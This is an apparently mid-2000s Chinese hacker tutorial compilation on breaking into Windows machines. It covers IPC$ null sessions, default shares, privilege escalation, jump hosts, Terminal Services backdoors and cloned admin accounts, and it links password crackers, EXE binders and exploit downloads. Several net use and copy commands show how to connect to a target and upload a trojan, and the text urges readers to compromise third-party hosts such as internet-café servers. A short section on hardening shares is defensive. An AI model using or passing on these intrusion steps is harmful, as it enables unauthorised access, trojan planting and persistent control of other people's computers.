http://www.sixthroom.com/ailan/f ... 2&RootID=343&ID=343
Windows XP下cmd命令详解
http://www.sixthroom.com/ailan/f ... 2&RootID=366&ID=366
ftp命令:
http://www.hotcy.org/chem/campous/article/ftp.htm
telnet命令简介:
http://www22.brinkster.com/lastknife/netbase/telnetorder.htm (以上地址简单介绍了TELNET命令,
http://www.sixthroom.com/ailan/f ... 2&RootID=277&ID=277
net命令基本用法:
http://www.yy0730.com/1/1/1/wen/list.asp?id=12
tftp命令: 由于TFTP命令过于简单,请自行使用“TFTP /?”进行查询。下面在给出一个参照的
实例:
http://levinstorm.myetang.com/main/tutorials/hacking/006.html
一般入侵所需要的几个常用命令:
http://www.yixindz.com/badschool/hacker/hack_commands.htm
Linux 的常用网络命令
http://www.jiejingwang.com/list.asp?id=522
第五章------关于windows98
简单说明:
这类问题有两种:一是怎样入侵win98系统,二是在win98怎样入侵。
由于98的网络功能并不完善,使得问题的解决远没有像对2000那样“丰富多采”。98默认没有什么网络服务启动,众所周知漏洞是由于各种服务的功能设计并不完美,所以才产生的,也就是说没有漏洞也就很难入侵,找不到什么可利用的漏洞。这给入侵带来的困难是难以想像的.共享入侵,算是最常见的攻击方式了。
相关资料:
共享入侵
http://www.sixthroom.com/ailan/f ... 2&RootID=269&ID=269
入侵windows98系统
http://www.sixthroom.com/ailan/f ... 2&RootID=270&ID=270
win98入侵网吧详解
http://www.sixthroom.com/ailan/f ... 2&RootID=271&ID=271
其实还有些方法,比如嗅探密码、发病毒和木马到信箱、甚至用QQ“联络感情”再传个绑木马的Flash等,没什么意思,就此打住(这是前辈说的,他老人家都说打住了,哪我也打住,其实是我也不知道说什么,呵呵)。
基于同样的理由,98不是一个好的攻击平台。如果只是端口扫描,那么superscan可以胜任。web类的漏洞扫描x-scan也可以。但涉及ipc$的弱口令、漏洞、远程控制工具以及连接一些服务(如sql)就要“基于NT技术构建”的os了。好在3389终端服务的客户端可以是98,所以先搞一台开3389的肉鸡就算是回避了问题。如果你还在用98,诚恳的建议你:请用2000。如果你在网吧,先试试入侵网吧服务器。(在这里我也要加一句就是如果你是用98系统的话,哪么选择榕哥的流光98版也是不错的。不过有很多功能也还是无法使用)。
鉴于98的问题技术含量不高、没有深入探讨价值,所以就谈到这里吧。(个人观点)
相关工具:
NetPass 1.0 破解98共享密码
http://lovezxd.myetang.com/indexpage/indextool/NetPass.zip
cain v2.5 综合破解工具
http://www.qq888.com/down/download.asp?Did=968
exeBinderZ 1.3 EXE捆绑机
http://www.heibai.net/download/show.php?id=3028&down=3
SUPERSCAN3.0中文版下载
http://download.pchome.net/php/d ... erscanv30.exe&svr=3
X-SCAN2.3下载
http://www.xfocus.net/download.php?id=366
流光98下载
http://www.netxeyes.com/cfluxay2k1for98setup.exe(因榕哥不愿意看到加了补丁的作品,为了尊重他老人家,所以这里不提供补丁下载,需要的就自己去找吧)。
终端服务客户端
http://arm.533.net/hack/winterminal.zip (既3389连接器)
第6章------关于ipc$、空连接和默认共享
简单说明:
******首先需要指出的是空连接和ipc$是不同的概念。空连接是在没有信任的情况下与服务器建立的会话,换句话说,它是一个到服务器的匿名访问。ipc$是为了让进程间通信而开放的命名管道,可以通过验证用户名和密码获得相应的权限。有许多的工具必须用到ipc$。默认共享是为了方便远程管理而开放的共享,包含了所有的逻辑盘(c$,d$,e$……)和系统目录winnt或windows(admin$)。******个人认为这段很重要,因为很多人根本就不知道什么是空连接什么是IPC$.建议不知道的朋友仔细看一下吧.这种问题,不应该不知道的.
相关帖子:
拒绝背后黑手的窥探 IPC$漏洞大揭秘
http://www.sixthroom.com/ailan/f ... 2&RootID=281&ID=281
IPC入侵全攻略
http://www.sixthroom.com/ailan/f ... 2&RootID=278&ID=278
win2k中C驱等的默认共享是怎么回事
http://www.sixthroom.com/ailan/f ... 2&RootID=282&ID=282
取消默认共享≠安全
http://js00.51.net/23/wudi/show. ... p;id=20021017212524
常见问题和回答:
一、怎样建立空连接,它有什么用?
答:使用命令 net use /IPipc$ "" /user:"" 就可以简单地和目标建立一个空连接(需要目标开放ipc$)。
对于NT,在默认安全设置下,借助空连接可以列举目标用户、共享,访问everyone权限的共享,访问小部分注册表等,没有什么利用价值。对2000作用就更小了。而且实现也不方便,需借助工具。如果你不理解“没用”的东西为什么还会存在,就看看“专业”的解释吧:
在NT/2000下的空连接
http://www.sixthroom.com/ailan/f ... 2&RootID=280&ID=280
解剖WIN2K下的空会话
http://www.sixthroom.com/ailan/f ... 2&RootID=283&ID=283
二、为什么我连不上IPC$?
答:1,只有nt/2000/xp及以上系统才可以建立ipc$。如果你用的是98/me是没有该功能的。
2、确认你的命令没有打错。正确的命令是: net use /目标IPipc$ "密码" /user:"用户名"
注意别多了或少了空格。当用户名和密码中不包含空格时两边的双引号可以省略。空密码用""表示。
3,根据返回的错误号分析原因:
错误号5,拒绝访问 : 很可能你使用的用户不是管理员权限的,先提升权限;
错误号51,Windows 无法找到网络路径 : 网络有问题;
错误号53,找不到网络路径 : ip地址错误;目标未开机;目标lanmanserver服务未启动;目标有防火墙(端口过滤);
错误号67,找不到网络名 : 你的lanmanworkstation服务未启动;目标删除了ipc$;
错误号1219,提供的凭据与已存在的凭据集冲突 : 你已经和对方建立了一个ipc$,请删除再连。
错误号1326,未知的用户名或错误密码 : 原因很明显了;
错误号1792,试图登录,但是网络登录服务没有启动:目标NetLogon服务未启动。(连接域控会出现此情况)
错误号2242,此用户的密码已经过期 : 目标有帐号策略,强制定期要求更改密码。
4,关于ipc$连不上的问题比较复杂,本论坛没有总结出一个统一的认识,我在肉鸡上实验有时会得出矛盾的结论,十分棘手。而且知道了问题所在,如果没有用其他办法获得shell,很多问题依然不能解决。问题过于细致后就不适合在本文章里探讨了。各位看着办吧,呵呵。
三、怎样打开目标的IPC$?
答:首先你需要获得一个不依赖于ipc$的shell,比如sql的cmd扩展、telnet、木马。当然,这shell必须是admin权限的。然后你可以使用shell执行命令 net share ipc$ 来开放目标的ipc$。从上一问题可以知道,ipc$能否使用还有很多条件。请确认相关服务都已运行,没有就启动它(不知道怎么做的请看net命令的用法)。还是不行的话(比如有防火墙,杀不了)建议放弃。
四、怎样映射和访问默认共享?
答:使用命令net use z: /目标IPc$ 密码" /user:"用户名" 将对方的c盘映射为自己的z盘,其他盘类推。
如果已经和目标建立了ipc$,则可以直接用IP加盘符加$访问。比如 copy muma.exe /IPd$pathmuma.exe 。或者再映射也可以,只是不用用户名和密码了:net use y: /IPd$ 。然后 copy muma.exe y:pathmuma.exe 。当路径中包含空格时,须用""将路径全引住。
五、如何删除映射和ipc$连接?
答:用命令 net use /IPipc$ /del 删除和一个目标的ipc$连接。
用命令 net use z: /del 删除映射的z盘,其他盘类推。
用命令 net use * /del 删除全部。会有提示要求按y确认。
六、连上ipc$然后我能做什么?
答:能使用管理员权限的帐号成功和目标连接ipc$,表示你可以和对方系统做深入“交流”了。你可以使用各种命令行方式的工具(比如pstools系列、Win2000SrvReskit、telnethack等)获得目标信息、管理目标的进程和服务等。如果目标开放了默认共享(没开你就帮他开),你就可以上传木马并运行。也可以用tftp、ftp的办法上传。像dwrcc、VNC、RemoteAdmin等工具(木马)还具有直接控屏的功能。如果是2000server,还可以考虑开启终端服务方便控制。这里提到的工具的使用,请看自带的说明或相关教程。
七、怎样防止别人用ips$和默认共享入侵我?
答:A、一种办法是把ipc$和默认共享都删除了。但重起后还会有。这就需要改注册表。
1,先把已有的删除
net share ipc$ /del
net share admin$ /del
net share c$ /del
…………(有几个删几个)
2,禁止建立空连接
首先运行regedit,找到如下主键[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlLSA]把RestrictAnonymous(DWORD)的键值改为:00000001。
3,禁止自动打开默认共享
对于server版,找到如下主键[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesLanmanServerParameters]把AutoShareServer(DWORD)的键值改为:00000000。
对于pro版,则是[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesLanmanServerParameters]把AutoShareWks(DWORD)的键值改为:00000000。
B、另一种是关闭ipc$和默认共享依赖的服务(不推荐)
net stop lanmanserver
可能会有提示说,XXX服务也会关闭是否继续。因为还有些次要的服务依赖于lanmanserver。一般情况按y继续就可以了。
C、最简单的办法是设置复杂密码,防止通过ipc$穷举密码。但如果你有其他漏洞,ipc$将为进一步入侵提供方便。
D、还有一个办法就是装防火墙,或者端口过滤。防火墙的方法就不说了,端口过滤看这里:
过配置本地策略来禁止139/445端口的连接:
http://www.sixthroom.com/ailan/f ... 2&RootID=284&ID=284
第7章------关于扫描出的漏洞
简单说明:
很多扫描器都有漏洞扫描功能。当你获得了一些主机的漏洞列表时,不要急着把它们帖在论坛上,期望别人来为你分析和告诉你利用的方法。你应该首先尝试自己完成这些。扫描出的漏洞并不是都有用的,一部分漏洞过时了,一部分是误报。如果你希望了解的多一些,最好经常到发布漏洞比较快的网站走一走,漏洞的利用是一个不段积累的过程。时间长了相信你就体会到了。
漏洞搜索:
绿盟的引擎
http://www.nsfocus.net/index.php?act=sec_bug
蓝盾的引擎
http://www.landun.org/zhongyao/sousuo.htm
补天网的引擎
http://www.patching.net/otherweb/leak/leakindex.asp
安全焦点的引擎
http://www.xfocus.net/vuln/index.php
小凤居的引擎
http://lilitou1.myetang.com/
相关帖子:
一个CGI漏洞的发现和利用
http://www.sixthroom.com/ailan/f ... 2&RootID=285&ID=285
cgi漏洞大全
http://www.sixthroom.com/ailan/f ... 2&RootID=293&ID=293
常见CGI漏洞及应对二
http://www.sixthroom.com/ailan/f ... 2&RootID=286&ID=286
常见CGI漏洞及应对一
http://www.sixthroom.com/ailan/f ... 2&RootID=287&ID=287
Windows 2000漏洞集锦1
http://www.sixthroom.com/ailan/f ... 2&RootID=288&ID=288
Windows 2000漏洞集锦2
http://www.sixthroom.com/ailan/f ... 2&RootID=289&ID=289
Windows 2000漏洞集锦3
http://www.sixthroom.com/ailan/f ... 2&RootID=290&ID=290
Windows 2000漏洞集锦4
http://www.sixthroom.com/ailan/f ... 2&RootID=291&ID=291
Windows 2000漏洞集锦5
http://www.sixthroom.com/ailan/f ... 2&RootID=292&ID=292
ASP漏洞大全
http://www.sixthroom.com/ailan/f ... 2&RootID=294&ID=294
IIS漏洞整理一
http://www.sixthroom.com/ailan/f ... 2&RootID=295&ID=295
IIS漏洞整理二
http://www.sixthroom.com/ailan/f ... 2&RootID=296&ID=296
中国网络安全响应中心各种漏洞大全
http://www.cns911.com/holes/linux/list.php
第8章------关于提升权限
简单说明:
黑客的最终目标就是得到root(即win中的admin)权限。一个真正的黑客会把一次入侵当做是自己的一件作品,不会轻易放弃,但是有些漏洞(典型的如Unicode漏洞、ASP木马)不能直接获得管理员权限,所以必然需要提升权限。一些新手可能会犯这类错误,以为中了木马、获得了shell就能控制一切。结果就出现“为何不能加用户”、“为何不能开3389”等问题。2000及更高版本os承袭了NT的安全结构,多重机制环环相扣来保障安全,特别是帐户安全。无奈安全系统过于庞大,多少会出现漏洞,于是我们就有机会了。 还要补充一点,就是在拿到一个现成的后门软件,或是一个木马的时候,一定要先看看说明。至少你应该知道这个后门运行后的效果吧?更有些人上传了某个后门软件或是木马到目标后就认为完事了,你不执行它就是传个地雷上去又有什么用呢?
相关工具:
erunasx 利用Debug Registers漏洞提升权限
http://www.qq888.com/down/download.asp?Did=796
Windows NT/2000权限提升工具,可以将任意用户提升到SYSTEM级别的权限。漏洞出在smss.exe中的DEBUG子系统,所有普通用户都可以通过该漏洞获得对系统中任意进程或线程句柄的控制,从而可以以SYSTEM或管理员权限执行任意命令。2、使用方法:假设我们已经获得一台机器上的一个GUEST用户(或其他普通用户),现在我们要这个工具来获得系统最高权限。进行如下步骤:把ERunAsX.exe和ERunAsX.dll这两个文件复制到目标主机上可访问的目录下,例如C:下。以GUEST身份运行"ERunAsX 要执行命令",例如"ERunAsX cmd.exe",这时执行的命令是以SYSTEM 权限运行的...(请注意:具体使用以软件内英文说明为准,内附该BUG解决办法)
PipeUpAdmin 对sp1及更低有效
http://maopao.com/down/download.asp?Did=69
ISPC 利用IIS的漏洞,详见自带说明
http://www.cnsq.net/sq88/down/show.asp?id=572&down=1
PHPBB论坛权限提升
http://www.newyouth.org/softdown ... .0.exploit_code.zip
WIN帮助文件溢出(可用于XP)
http://www.newyouth.org/softdown ... ack/chmoverflow.zip
NT/2K权限提升工具GetAdmin下载
http://www.csdn.net/cnshare/soft/openfile.asp?kind=1&id=9807
相关帖子:
NT/2000提升权限的方法小结
http://www.sixthroom.com/ailan/f ... 2&RootID=297&ID=297
关于WIN2000的入侵,以及安全防御等问题(文章包含一次利用U漏洞提高权限的过程)
http://www.sixthroom.com/ailan/f ... 2&RootID=298&ID=298
UNICODE漏洞介绍及入侵
http://www.sixthroom.com/ailan/f ... 2&RootID=299&ID=299
怎样提升权限,做后门
http://www.sixthroom.com/ailan/f ... 2&RootID=300&ID=300
一般用户获取NT服务器Admin权限的方法
http://www.sixthroom.com/ailan/f ... 2&RootID=302&ID=302
Windows NT4的安全结构(对新手有些难,了解一下吧)
http://www.sixthroom.com/ailan/f ... 3&RootID=303&ID=303
第9章------关于做代理和跳板
简单介绍:
代理服务器英文全称是Proxy Cerver,其功能就是代理网络用户去取得网络信息。形象的说:它是网络信息的中转站。在一般情况下,我们使用网络浏览器直接去连接其他Internet站点取得网络信息时,须送出Request信号来得到回答,然后对方再把信息以bit方式传送回来。代理服务器是介于浏览器和Web服务器之间的一台服务器,有了它之后,浏览器不是直接到Web服务器去取回网页而是向代理服务器发出请求,Request信号会先送到代理服务器,由代理服务器来取回浏览器所需要的信息并传送给你的浏览器。而且,大部分代理服务器都具有缓冲的功能,就好象一个大的Cache,它有很大的存储空间,它不断将新取得数据储存到它本机的存储器上,如果浏览器所请求的数据在它本机的存储器上已经存在而且是最新的,那么它就不重新从Web服务器取数据,而直接将存储器上的数据传送给用户的浏览器,这样就能显著提高浏览速度和效率。更重要的是:Proxy Server (代理服务器)是 Internet链路级网关所提供的一种重要的安全功能,它的工作主要在开放系统互联 (OSI) 模型的对话层,有了对代理的了解,相信你也认识到了什么是跳板。
相关工具:
SocksCap 2.2 SOCKS调度工具
http://www.123gz.com/dzc/download/sc32r231.exe
SkSockServer1.04 代理跳板
http://www.123gz.com/dzc/download/sksockserver.zip
Snake跳板傻瓜版
http://www.123gz.com/dzc/download/sgtb.zip
代理猎手V3.1Beta1简装版
http://www.123gz.com/dzc/download/proxyhunter.zip
FTP Serv-U 4.0 正式汉化版,最常用的ftp服务程序
http://61.159.224.188/makesoftur ... 627E207574756375737
slimftp 隐蔽的ftp服务器
http://www.whitsoftdev.com/files/slimftpd.zip
天雁WEB服务器 不用安装的小型web服务程序
http://www.cnzzz.com/download/do ... 33352254709&Url=100
多种服务程序下载
http://www.zdnet.com.cn/download/windows/business/swlist/0,2008004954,39000268r,00.htm?sort=5
相关帖子:
代理、肉鸡、跳板的概念
http://www.sixthroom.com/ailan/f ... 2&RootID=305&ID=305
代理服务器(Proxy)完全解析
http://www.sixthroom.com/ailan/f ... 2&RootID=307&ID=307
如何使用代理服务器
http://www.sixthroom.com/ailan/f ... 2&RootID=309&ID=309
简单制作跳板
http://www.123gz.com/dzc/sksockserver-cusky.htm
Serv-U设置教程
http://www.enanshan.com/ftp/
SocksCap32 使用详解
http://www.123gz.com/dzc/sockscap32.htm
在肉鸡上安装FTP服务器
http://www.sixthroom.com/ailan/f ... 2&RootID=306&ID=306
利用 unicode 漏洞,轻松建立自己的代理服务器
http://www.123gz.com/dzc/sksockserver-nicky-1.htm#top1
特别推荐猎手与蚂蚁收藏馆
http://www.123gz.com/ (绝对值得一看)
第10章------关于终端服务(3389)
简单说明:
windows终端服务提供了通过作为终端仿真器工作的“瘦客户机”软件远程访问服务器桌面的能力。图形界面和不影响当前本地用户的特性是它的最大优点。由于它是2000server及以上版本自带的功能,因此成为一个绝好的“后门”而倍受青睐。而且win98也可以成为客户端,这使得在网吧“工作”成为可能。有一点需要强调一下使用客户端登陆远程主机对当前工作的用户没有影响,而且一切动作本地用户都是看不到的。也就是说远程登陆和本地用户是在不相同的空间,两者互不干扰。
相关工具:
WIN2000客户端
http://zudu2000.myetang.com/soft/win2k.rar
winxp下的客户端 功能比2000下的更强大
http://zudu2000.myetang.com/soft/windowsXP.zip
终端服务程序的一个补丁 使本地和远程间能复制文本
http://www.sandflee.net/wawa/tools/rdpclip_hotfix.exe
web版终端客户端 使用浏览器调用ActiveX控件访问终端服务
http://www.enanshan.com/down/tswebsetup.exe
C3389.EXE 修改终端服务端口号的工具
http://www.sandflee.net/down/show.asp?id=228&down=1
Win2k终端服务器端所需文件包
http://www.netsill.com/download/download.asp?Did=1965
3389自动安装程序-djshao正式版5.0
http://netsill.com/download/download.asp?Did=2019
开启3389工具(如果要想让远程主机开启WIN2000的终端服务,请把3389.exe也传到远程主机上并运行。然后等待一个漫长的时间(由于是无人执守安装)。就可以看到远程主机的3389端口会被打开。)
http://netsill.com/download/download.asp?Did=1991
W2K终端服务客户端安装版
http://www.sandflee.net/down/show.asp?id=39&down=1
相关帖子:
关于远程启动终端服务的帖子
http://www.sixthroom.com/ailan/f ... 2&RootID=385&ID=385
终端服务问题常见问答
http://www.sixthroom.com/ailan/f ... 2&RootID=386&ID=386
图文讲解输入法漏洞入侵
http://www.sandflee.net/txt/list.asp?id=22
3389自动安装工具教程
http://netsill.com/download/download.asp?Did=2068
3389动画教程(密码china)
http://netsill.com/download/download.asp?Did=1990
修改终端客户端端口动画教程
http://netsill.com/download/download.asp?Did=2009
3389资料
http://www21.brinkster.com/srob/wawa/wawa/3389txt.htm
第11章------关于克隆帐号
简单说明:
克隆帐号的原理简单的说是这样:在注册表中有两处保存了帐号的SID相对标志符,一处是SAMDomainsAccountUsers下的子键名,另一处是该子键的子项F的值中。这里微软犯了个不同步它们的错误,登陆时用的是后者,查询时用前者。当用admin的F项覆盖其他帐号的F项后,就造成了帐号是管理员权限但查询还是原来状态的情况。即所谓的克隆帐号。(前辈就是前辈把大家想到的都写出来了,我实在不知道这里在加些什么了。看来也只有这样了。大家如果还有什么不明白的就到论坛里发贴子吧。
具体的看这里:
解剖安全帐号管理器(SAM)结构
http://www.sixthroom.com/ailan/f ... 3&RootID=387&ID=387
明白原理后就可以手动或者用现成的工具克隆帐号了。
相关工具:
克隆ca.exe
http://www.netxeyes.org/CA.exe
检查克隆cca.exe
http://www.netxeyes.org/CCA.exe
手动克隆需要SYSTEM权限,用它 psu.exe
http://www.sandflee.net/down/show.asp?id=176&down=1
相关帖子:
工具克隆:ca和cca 请访问作者主页
http://www.netxeyes.org/main.html
psu用法:psu.exe提升为system权限
http://www.sixthroom.com/ailan/f ... 2&RootID=390&ID=390
手动克隆:如何克隆管理员帐号
http://www.sixthroom.com/ailan/f ... 3&RootID=388&ID=388
如何克隆管理员帐号的补充
http://www.sixthroom.com/ailan/f ... 3&RootID=389&ID=389
0:58 |
添加评论
|
固定链接
|
引用通告 (0)
|
写入日志
精华黑客入门
主要有:
一: 关于ping命令的一些用法:
===================================================================================
1.新兵的故事(ping篇)
http://blog.hackbase.com/wuming/archive/2005/07/20/8279.aspx
2.新兵的故事(ip篇)
http://blog.hackbase.com/wuming/archive/2005/07/19/8188.aspx
3.新兵的故事(域名篇)
http://blog.hackbase.com/wuming/archive/2005/07/19/8174.aspx
===================================================================================
关于NC的一些用法
NC是一个很不错的黑客工具一句话俩句话我也说不清楚
下面我给了关于NC使用教程的下载 大家可以去看看
二: 关于扫描器的一些使用方法(以下的下载请看<常用的扫描器用法>)
无名大哥讲了hscan的用法,其实他的用意并不是让大家只会用这一种的,是为了给大家一个启示
让大家明白扫描器的一些原理,举一反三,希望大家可以灵活的运用扫描器,要了解这些
你必须要明白什么是端口
=======================================================================
什么是端口
必须明白什么是端口。首先需要明白的一点是,我们这里所说的端口,不是计算机硬件的I/O端口,而是软件形式上的概念。服务器可以向外提
供多种服务,比如,一台服务器可以同时是WEB服务器,也可以是FTP服务器,同时,它也可以是邮件服务器。为什么一台服务器可以同时提供
那么多的服务呢?其中一个很主要的方面,就是各种服务采用不同的端口分别提供不同的服务,比如:WEB采用80端口,FTP采用21端口等。这
样,通过不同端口,计算机与外界进行互不干扰的通信。
工具提供服务类型的不同,端口分为两种,一种是TCP端口,一种是UDP端口。计算机之间相互通信的时候,分为两种方式:一种是发送信
息以后,可以确认信息是否到达,也就是有应答的方式,这种方式大多采用TCP协议;一种是发送以后就不管了,不去确认信息是否到达,这种
方式大多采用UDP协议。对应这两种协议的服务提供的端口,也就分为TCP端口和UDP端口。
=======================================================================
知道了什么的端口,才能了解怎么去扫描,为什么要去扫描,扫描有什么用处。那什么是
端口扫描:
=======================================================================
计算机打开那些端口可以通过一定的网络命令来检测,但是,我们没有必要一个个去试验,因为我们有专门的端口扫描工具。
工具扫描方式的不同,端口扫描器分为两者:
第一种针对一个连续网段扫描特定端口。这种工具常用于寻找特定主机或者特定服务,比如WEB服务器,也可以用来检测是否中了木马,比如检
测7626端口来检测冰河。这种工具有NetBrute。
第二种针对一台特定的服务器扫描所有端口。这种工具常用于攻击一台特定主机以前搜集此主机的大致信息,确定攻击方案。这种工具有
SuperScan。
========================================================================
同时,无名大哥还讲了一些关于端口的防御的查看大家可以去看看:
http://bbs.hackbase.com/viewthread.php?tid=2717765&fpage=1
(同时我也将比较常用的前几千个端口的名称打包了 方便大家学习)
看到了把,其实无名大哥讲的其实都是一些基础中的基础,其中的流程是这样
首先呢,要得到你想要入侵或者说的了解的目标的信息,尽可能多的信息,
比如,IP(最基本的),服务器名称 版本 以及它所存在的漏洞等等等等
在次呢,就是要把你所得到的这些信息加以分析 看看它有什么样的漏洞 然后加
以利用
最后呢就是用工具或者说你知道的知识 去进入对方的电脑了
这就是一般的入侵所需要的流程 那现在我们就这个流程 来介绍一下在这个流程当中
所要需要懂的了解的一些知识
========================================================================
========================================================================
第一步:得到目标的信息
得到信息的方法分很多种 现在就我知道的几种流行的几种方法向大家做一个介绍
1:从端口扫描
上面我们已经介绍了一些关于端口的知识,从那里我们可以知道,一台计算机
连接到INTERNET,需要从从每个开起的端口中,得到所需要的服务,所以:
我们就应该掌握一下端口扫描,通过端口扫描我们就可以很快速的得到一台主机
的信息.具体的端口扫描器的使用方法我已经给大家准备好了 在文章的下面有
下载 我在这里说一说几个比较常用的软件:
⒈ x-scan
⒉ 流光
⒊ S(目前我觉的最快的有个扫描器)
⒋ x-way
.......................
其实有很多 我说也说不完 只是简单的介绍了一下 我在下载里面介绍了几中扫描器
的使用方法,其实我觉的效果有的不一样,但是原理都一样 都是为了探测目标的信息
的.在这里,我就不一一的列举每个软件的教程了,因为这样的太多,具体的使用方法
和诀窍还要在你不段使用中才能掌握的.
2:从一些开起的端口中获得
比如一些系统的版本.我们就拿FTP来说把
=========================================================================
FTP(File Transfer Protocol,文件传输协议是Internet上使用非常广泛的一种通讯协议,它是为Internet用户进行文件传输(包括文件的上传
和下载)而制定的。要想实现FTP文件传输,必须在相连的两端都装有支持FTP协议的软件,装在您的电脑上的叫FTP客户端软件,装在另一端服
务器上的叫做FTP服务器端软件。
=========================================================================
当你连接到服务器端的时候,回出现下面这样的信息
Microsoft FTP Service (Version 5.0)
从这里我们就可以看到FTP的Version是5.0的
象这样的信息还很多如UNIX里面主机连接以后也会显示相应的信息
还有就是在用PING命令时,在TTL的返回植里面也可以判断出主机的系统类型
第二步:收集信息 加以分析 寻找入侵方法
当用我们把目标的信息加以全面的分析的话一般你就可以得到很多可以入侵的资料
现在我就把现在比较流行的几种入侵的方法简单的介绍一下
NO1:-----------SQL注入
==========================================================================
SQL注入 传说在微软的主页里面有时候都可以看到 这样的漏洞在现在很流行
1,什么是SQL注入?
SQL注入,就是利用欺骗的方式,通过网页的查询功能,或查询命令注入。
当用户来到网站,会提交一些数据,再到数据库进行查询,确定此用户的身份。
举个简单的例子来说吧,你去一个站点的论坛,那么,你会输入你的用户名和
密码,点“确定”,网站会通过数据库的查询来判断你是不是他们的用户,
你的用户名和密码是否正确。而利用SQL注入,通过构造特殊的语句,来查找我
们所想要得到的信息,如管理员的帐号密码。以下,小林用了
http://xxx.xxx.com
来表示一个存在注入漏洞的网页。
2,助手篇,
先把IE菜单-工具-Internet选项-高级-显示友好 HTTP 错误信息前面的勾去掉。
否则,不论服务器返回什么错误,我们都只能看到“HTTP 500服务器错误”,不能获得更多的提示信息
3,哪些网页能利用?
我们去找一些要提交数据的网页,如:登陆页面,查找页面,添加页面等
后缀如asp,jsp,cgi,php网页,如果是静态的那就另外说了
这里给出了菜鸟的注入的一篇文章 写的很不错 大家可以去看看
http://bbs.hackbase.com/viewthre ... ght=SQLע